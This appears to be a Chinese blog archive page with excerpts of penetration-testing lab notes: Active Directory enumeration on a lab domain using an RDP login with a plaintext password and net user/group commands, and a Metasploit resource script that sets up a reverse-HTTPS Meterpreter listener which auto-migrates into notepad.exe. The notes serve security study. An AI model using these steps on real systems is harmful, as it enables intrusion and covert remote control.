發表文章

目前顯示的是 10月, 2023的文章

Active Directory 列舉 - 手動與自動

圖片
 Active Directory 列舉 - 手動與自動 Normal User : stephanie (Member of Remote Desktop Group) Domain FQDN : corp.com Client : Windows 11 機器 IP 192.168.45.168 kali 192.168.208.70 dc1 192.168.208.72 web04 192.168.208.73 files04 192.168.208.74 client74 192.168.208.75 client75 192.168.208.76 client76 一開始使用網域帳號 Stephanie / LegmanTeamBenzoin! RDP 登入到 Client 75 └─$ xfreerdp /u:stephanie /d:corp.com /v:192.168.208.75   會出現要我們輸入密碼,這時再輸入密碼即可,結果 GG 反覆測試後要加上忽略憑證,以及密碼直接帶入,但因為密碼有兩個驚嘆號,所以加上單引號 └─$ xfreerdp /u:stephanie /p:'LegmanTeamBenzoin!!' /d:corp.com /v:192.168.208.75 /cert:ignore net user /domain 列舉網域的使用者帳號 管理者通常喜歡在帳號的前面或是後面加上 admin 的字眼,所以從上圖中我們首先接著列舉使用者帳號 jeffadmin,net user jeffadmin /domain 結果馬上中獎是 Domain Admins 群組成員 列舉網域的群組, net group /domain 透過 net 指令列舉特定網域群組 "Sales Department" 指令 net group "Sales Department" /domain 管理部門的使用者 net group "Management Department" /domain,只有 jen 一個帳號 練習題的 flag 藏在列舉網域群組中 使用 PowerShell 和 .NET 類別列舉 Active Directory LDAP 路徑的原型  LDAP://H...

自動化 Metasploit

圖片
 自動化 Metasploit 先執行 Metasploit 然後啟動多/處理程序模組 use exploit/multi/handler set PAYLOAD windows/meterpreter_reverse_https set LHOST 192.168.45.208 set LPORT 443 接著配置 AutoRunScript 選項,以便在建立會話後自動執行模組 此範例,我們使用 post/windows/manage/migrate 模組。 這將導致產生的 Meterpreter 自動啟動後台 notepad.exe 進程並遷移到它 接著將 ExitOnSession 設為 false,以確保偵聽器在建立工作階段後繼續接受新連線 最後添加帶有參數 -z 和 -j 的 run,以將其作為後台作業運行,並阻止我們自動與會話互動 set AutoRunScript post/windows/manage/migrate set ExitOnSession false run -z -j 現在,讓我們儲存腳本,建立一個 listener.rc 將上述指令通通包進去 輸入 msfconsole 並將資源腳本作為 -r 的參數來啟動 Metasploit 指令 sudo msfconsole -r listener.rc 跟上述手動執行結果一樣,啟動後直接 listen 443 一樣透過 met.exe 看到自動連到 443,然後腳本自動執行 migrate 到記事本了 上述是我們自己建立的一個腳本,事實上在 Metasploit 中有許多自動化的腳本位於 Metasploit 目錄的 script/resource/ 目錄中可供直接使用 └─$ ls -l /usr/share/metasploit-framework/scripts/resource 設定 RHOST 時使用 set RHOST 但若要設定全域設定可以用 setg RHOST,取消是 unsetg RHOST portscan.rc 掃描的第一個 Port 是 7 └─$ cat /usr/share/metasploit-framework/scripts/resource/portscan.rc 練習 3 靶機 192.168.186.225/226 有一...